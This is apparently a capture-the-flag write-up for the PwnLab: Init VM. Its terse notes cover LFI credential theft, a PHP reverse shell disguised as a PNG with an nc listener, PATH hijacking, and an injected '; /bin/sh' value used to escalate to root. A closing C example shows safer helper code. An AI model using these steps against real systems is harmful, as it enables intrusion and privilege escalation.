pwnlab init writeup - PacketMonkey22/boot2roots GitHub Wiki
pwnlab-init-writeup
nmap -A -T4 -p- $ip
Ports 111, 48170, 51403, and 3306 (mysql)
dirb http://$ip
Tried sql injection and basic LFI
Tried LFI base 64 bypass on upload page
Page refers to config page
LFI base 64 on config page
Username and password for mysql
mysql -h $ip -u root -p
show databases;
use $database;
select * from $table;
Base64-decode the pass fields to get the passwords
Log in, then upload reverse shell
download pwnlab png
modify reverse shell then cat png/php >> shells.png
upload shells.png (view image, name changed)
tamperdata
confirmed Lang LFI
nc -nlvp 8888
lang image, success
whoami/id -- www-data
tty shell
login users - mike fails
kane has msgmike file
cat line in file. appears to be running the command
try running, nothing
strings msgmike - cat /home/mike/msg.txt
$PATH
export PATH=/home/kane:$PATH
echo "/bin/sh" > cat
chmod +x cat
./msgmike
whoami/id - mike
cd ../mike
ls -al - msg2root file
./msg2root - runs what I enter as echo
./msg2root again - enter word; /bin/sh
whoami/id - root
cd /root
ls
cat flag.txt
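Both escalation steps above depend on a privileged helper handing work to a shell: msgmike resolves a bare `cat` through $PATH, and msg2root lets typed input reach a shell `echo`. The following is an added example, not code from the VM or from this wiki, showing how such helpers can do the same jobs in-process so that neither $PATH nor shell metacharacters matter.
Assumptions: the internals of both binaries are inferred from the `strings` output and the behaviour noted above; the function names and the sample path are hypothetical.

```c
#include <stdio.h>
#include <string.h>

/* Replacement for shelling out to `cat <file>`: read the file in-process
 * through an absolute path, so $PATH is never searched for a "cat". */
int read_message(const char *abs_path, char *out, size_t outlen) {
    if (abs_path == NULL || abs_path[0] != '/' || out == NULL || outlen == 0)
        return -1;                       /* absolute paths only */
    FILE *f = fopen(abs_path, "r");
    if (f == NULL)
        return -1;
    size_t n = fread(out, 1, outlen - 1, f);
    out[n] = '\0';
    fclose(f);
    return (int)n;                       /* bytes read */
}

/* Replacement for building an `echo <input>` command line for a shell
 * (assumed behaviour): the input is written as data, so ';', '|', '$'
 * and backticks stay literal because no shell ever parses them. */
int append_message(const char *abs_path, const char *msg) {
    if (abs_path == NULL || abs_path[0] != '/' || msg == NULL)
        return -1;
    FILE *f = fopen(abs_path, "a");
    if (f == NULL)
        return -1;
    int rc = (fprintf(f, "%s\n", msg) < 0) ? -1 : 0;
    if (fclose(f) != 0)
        rc = -1;
    return rc;
}

int main(void) {
    /* Constructed sample path and input, not taken from the VM. */
    const char *path = "/tmp/example_messages.txt";
    char buf[256];
    remove(path);
    if (append_message(path, "hello; /bin/sh") != 0)
        return 1;
    if (read_message(path, buf, sizeof buf) < 0)
        return 1;
    printf("stored verbatim: %s", buf);
    return 0;
}
```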